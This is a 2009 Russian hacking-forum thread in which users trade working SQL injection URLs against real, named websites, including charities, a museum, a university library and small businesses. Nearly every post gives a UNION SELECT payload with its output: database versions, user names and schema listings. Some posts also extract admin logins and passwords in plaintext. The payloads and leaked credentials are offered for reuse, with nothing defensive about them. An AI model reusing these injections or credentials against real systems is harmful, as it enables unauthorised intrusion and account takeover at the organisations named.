ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #7991  
Старый 24.02.2009, 00:15
Аватар для hackmen
hackmen
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447

Репутация: 123
По умолчанию

PR6
Peace Talks :: Peace & Security


http://www.ploughshares.org/news.php?id=-540+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19--

4.0.24_Debian-10sarge2-log


PR5
Children's Cause for Cancer Advocacy


http://www.childrenscause.org/news.php?id=-201+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,version()--

4.1.22-log

PR6
Columbus Museum of Art

http://www.columbusmuseum.org/about/news.php?id=-13+union+select+1,unhex(hex(version())),3,4,5,6,7, 8,9--

4.1.12-standard

Последний раз редактировалось jokester; 24.02.2009 в 00:35.. Причина: electionguide.org БОЯН
 
Ответить с цитированием

  #7992  
Старый 24.02.2009, 00:15
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

PageRank 7

Цитата:
http://library.mcmaster.ca/php/blog.php?id=-12+union+select+null,null,null,null,null,version() ,null,null,null--&display=full
PostgreSQL 8.3.6 on i386-redhat-linux-gnu, compiled by GCC gcc (GCC) 4.3.0 20080428 Red Hat 4.3.0-8


Цитата:
http://library.mcmaster.ca/php/blog.php?id=-12+union+select+null,null,null,null,null,tablename ,null,null,null+from+pg_tables--&display=full
Да да да с праздником вас !



Цитата:
http://www.nwegg.org.uk/view_event.php?id=71709380982+union+select+1,conca t_ws(0x3a,version(),user(),database()),3,4,5,6,7,8 ,9,10,11,12,13,14,15,16,17,18,19--
Version: 4.1.22-standard-log
User: nwegg@localhost
Database: nwegg



Цитата:
http://www.getaway.co.za/content/getaway/magazine/blogs/singlepage.asp?id=132%20or%201=@@version--


Microsoft SQL Server 2005 - 9.00.3159.00 (Intel X86) Mar 23 2007 16:15:11 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)




PageRank = 6


Цитата:
http://www.ettu.org/ettucup_news_view.php?id=69897179879832+UNION+SELE CT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version() ,0x3a,Database(),0x3a,User(),0x3a),0x71),0x71),3,4 ,5,6,7,8,9,10,11--

Database Version: 4.1.10-standard
Database name: ettu_db01
User name: ettu_admin@localhost


PageRank = 5


Цитата:
http://www.exim.lv/?module=events&do=show&id=1987379872987+union+sele ct+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),user() ,database()),10,11,12,13,14,15--

Database Version:4.1.22
User name: liaa_exim@localhost
Database name: liaa_exim



PageRank = 6


Цитата:
http://www.fundacioperlapau.org/interior_actualitat.php?ID=17987986532+union+selec t+1,2,concat_ws(0x3a,version(),user(),database()), 4,5,6,7--

Database Version: 5.0.32-Debian_7etch8
Database name: perlapau
User name: perlapau@pau.pangea.org




PageRank = 6


Цитата:
http://www.worldvision.org.sg/CF-Catalogue.php?catID=3+union+select+1,concat_ws(0x3 a,version(),user(),database()),3,4,5,6--

Version: 5.0.24a-community-nt
User: worldvisionorgsg@localhost
Database: worldvisionorgsgdata

Последний раз редактировалось spherics; 24.02.2009 в 02:58..
 
Ответить с цитированием

  #7993  
Старый 24.02.2009, 04:25
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://caraibesfm.com/index.php?cat_id=&tim=-1+union+select+1,2,3,4,5,concat_ ws(0x3a,versio n(),database(),user()),7,8,9--

Database Version : 4.1.22-standard
Database name : caraibes_caraibesfm
User name : caraibes_caraibe@localhost


админ:

Код:
http://caraibesfm.com/index.php?cat_id=&tim=-1+union+select+1,2,3,4,5, concat_ ws(0x3a,username,password),7,8,9+from+users+limit+0,1--
Код:
mgattereau:tmomo051399
 
Ответить с цитированием

  #7994  
Старый 24.02.2009, 19:35
Аватар для SEWERN
SEWERN
Участник форума
Регистрация: 09.01.2009
Сообщений: 155
Провел на форуме:
2253612

Репутация: 94
По умолчанию

Код:
http://hotel.tver.ru/_content.php?Id=2.5+union+select+1,2,3--
Код:
http://www.gak.kiev.ua/?rubr=life&id=18+union+select+1,2,3,4,5--

Последний раз редактировалось SEWERN; 24.02.2009 в 19:44..
 
Ответить с цитированием

  #7995  
Старый 24.02.2009, 19:44
Аватар для wildshaman
wildshaman
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
Провел на форуме:
12942062

Репутация: 1550


Отправить сообщение для wildshaman с помощью ICQ
По умолчанию

Код:
http://www.saltykov.net.ru/lib/ar/author/-1+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6
u23504@10.10.12.71:5.0.45-log:u23504_2
 
Ответить с цитированием

  #7996  
Старый 24.02.2009, 20:55
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.thx.ro/notebook--uri-dell/notebook-dell-inspiron-1501-sempron-3500_20_99_251+UNION+SELECT+1,VERSION(),DATABASE() ,USER(),5,6,7,8,9,10,11,12,13,14,15+LIMIT+1,1/*.htm



Version : 4.1.22-standard-log
Database : thx_thx
User : thx_thx@localhost
 
Ответить с цитированием

  #7997  
Старый 24.02.2009, 21:31
Аватар для Dimionx
Dimionx
Познающий
Регистрация: 28.08.2008
Сообщений: 39
Провел на форуме:
243087

Репутация: 12
Отправить сообщение для Dimionx с помощью ICQ
По умолчанию

www.pioneer-spb.ru

Код:
http://www.pioneer-spb.ru/news.php?id=-17+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6/*
Версия - 5.0.32-Debian_7etch6-log
Юзер - z34747_3@77.221.130.25
БД - z34747_3


Код:
http://www.pioneer-spb.ru/news.php?id=-17+union+select+1,2,3,concat_ws(0x3a,table_name,column_name),5,6+from+information_schema.columns+limit+340,1/*
Вывод табличек и колонок

Код:
http://www.pioneer-spb.ru/news.php?id=-17+union+select+1,2,3,concat_ws(0x3a,login,pass,name,stat,pri),5,6+from+users+limit+2,1/*
Вывод юзеров
login:pass:name
pioneer:liteon:Магазин Pioneer
и т.д. по лимиту
 
Ответить с цитированием

  #7998  
Старый 24.02.2009, 21:37
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Мини-футбольный клуб Динамо-Ямал
Тиц : 325
PR : 5


Код:
http://www.mfkdinamo.ru/index.php?id=4590+union+select+1,2,3,concat _ws(0x3a,version() ,database(),user()),5,6,7,8,9,10--
Database Version : 4.0.26
Database name : wwwmfkdinamoru
User name : mfkdinam@box.hc.ru


недоковырял:

Код:
http://www.mfkdinamo.ru/index.php?id=4590+union+select+1,2, 3,4,5,6 ,7,8,9,10+from+admin--
 
Ответить с цитированием

  #7999  
Старый 24.02.2009, 22:22
Аватар для Dimionx
Dimionx
Познающий
Регистрация: 28.08.2008
Сообщений: 39
Провел на форуме:
243087

Репутация: 12
Отправить сообщение для Dimionx с помощью ICQ
По умолчанию

www.referats-online.ru

Код:
http://www.referats-online.ru/news.php?id=17+union+select+concat_ws(0x3a,version(),user(),database()),2,3
Версия - 5.0.70
Юзер - kalinov_refer@localhost
БД - kalinov_refer


Код:
http://www.referats-online.ru/news.php?id=17+union+select+concat_ws(0x3a,table_name,column_name),2,3+from+information_schema.columns

Вывод всех табличек и колонок
 
Ответить с цитированием

  #8000  
Старый 24.02.2009, 22:50
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.stillco.ro/index.php?cat_id=-237'+union+select+1,2,3,4,5,6,concat_ws(0x3a,versi on(),database(),user()),8,9,0,1,2,3,4,5,6/*&catname='Toshiba'



Database Version: 5.0.45
Database name: stillco
User name: stillcodb@localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ